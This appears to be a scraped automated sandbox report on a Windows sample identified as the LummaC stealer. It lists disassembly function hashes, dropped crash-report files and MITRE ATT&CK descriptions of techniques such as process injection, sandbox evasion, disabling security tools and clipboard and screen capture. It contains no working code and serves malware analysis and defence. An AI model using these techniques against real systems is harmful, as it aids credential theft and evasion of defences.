Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5cf3d3f30d9613fe2714edcff59f0b0304f0c98455ce6f2d5f572e95ba5a2b3d
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 10114C33A051D04EC31A8D7C844056ABFF30A97274F2D939AF4F5AB2D2D6278D8B8359

Function 00430CC0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaac78c8cd68a7ef2a1be881b231878366a9c247148d4d2edc3e404ad033c8a4
Instruction ID: ed189d3e896a10b0522a78e84ad2b8f9b6df22bdec7557734b8ad8c6367bbd7f
Opcode Fuzzy Hash: aaac78c8cd68a7ef2a1be881b231878366a9c247148d4d2edc3e404ad033c8a4
Instruction Fuzzy Hash: 4E019EB160030187E7209F65E4E072BA2E86F98708F18273EE80957342DB79EC098299

Function 0041AB90 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6741416765b83c74a1c2c5cba02842341f77218c3f9d8f562cc197a6a78b22bd
Instruction ID: de6e10c6ac35777bcd7977231f09f0839b9338373d8b97cfe4fbdb5b7db4e514
Opcode Fuzzy Hash: 6741416765b83c74a1c2c5cba02842341f77218c3f9d8f562cc197a6a78b22bd
Instruction Fuzzy Hash: 31F027B1A0819017DB218D449C80FB7BBADCB87228F190456EA8157202E1356C9083EE

Function 00442410 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: e276e2e20c09421a09e08c01a3586b5c7f2cd1a113514abf4008fb378859171c
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: D1D0A72160832146AB788E1AA500977F7F0EAC7B11FC9A55FF582E3248D634DC41C2BD

Function 0043ACD2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043AD1D
GetSystemMetrics.USER32 ref: 0043AD2C

Strings

, xrefs: 0043AE00

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 7c882c57007ae2b99843c88eb0c07b372622de9aeed33002503f8c382e2d4657
Instruction ID: d31701c45078c7d4269a8adf496a0dfe1e86747451595843b7a2005472f7adb8
Opcode Fuzzy Hash: 7c882c57007ae2b99843c88eb0c07b372622de9aeed33002503f8c382e2d4657
Instruction Fuzzy Hash: 9A5180B4E142189FDB40EFACD985A9EBBF0BB48310F11852DE858E7350D734A949CF86

Function 0043A77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043A7B1
GetSystemMetrics.USER32 ref: 0043A7C0

Strings

, xrefs: 0043A86B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 013dc761e4909440771d46bafdb638bb20e567719734dc29c98b96e9aaa0edbc
Instruction ID: 5819706d29ef5a07fa912cd141edfc67d55658e54de8dc311193a39933180409
Opcode Fuzzy Hash: 013dc761e4909440771d46bafdb638bb20e567719734dc29c98b96e9aaa0edbc
Instruction Fuzzy Hash: 5C319FB49182009FDB00EF78D985A1EBBF4BB89304F11853DE898D7360D774A949CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FoS5cjKhd3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_7e74a33335a2f965bc130b952e35e6871e573e3_5be246a5_ef375b0f-a442-4bce-a5f6-0408d35425df\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDA4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEED.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF3C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FoS5cjKhd3.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
FoS5cjKhd3.exe

Function 02CD2151 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 02B60C40 Relevance: .3, Instructions: 321
COMMON

Function 02B61218 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Function 02B61220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 004404AB Relevance: 21.6, APIs: 9, Strings: 3, Instructions: 644
memoryCOMMON

Function 00412450 Relevance: 13.2, APIs: 4, Strings: 3, Instructions: 916
COMMON

Function 004408E6 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 348
COMMON

Function 0040D470 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 153
threadCOMMON

Function 00447AC9 Relevance: 5.3, Strings: 4, Instructions: 253
COMMON

Function 004402A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
comCOMMON

Function 0040F042 Relevance: 1.5, Strings: 1, Instructions: 268
COMMON

Function 004476D0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00447E1B Relevance: 1.3, Strings: 1, Instructions: 97
COMMON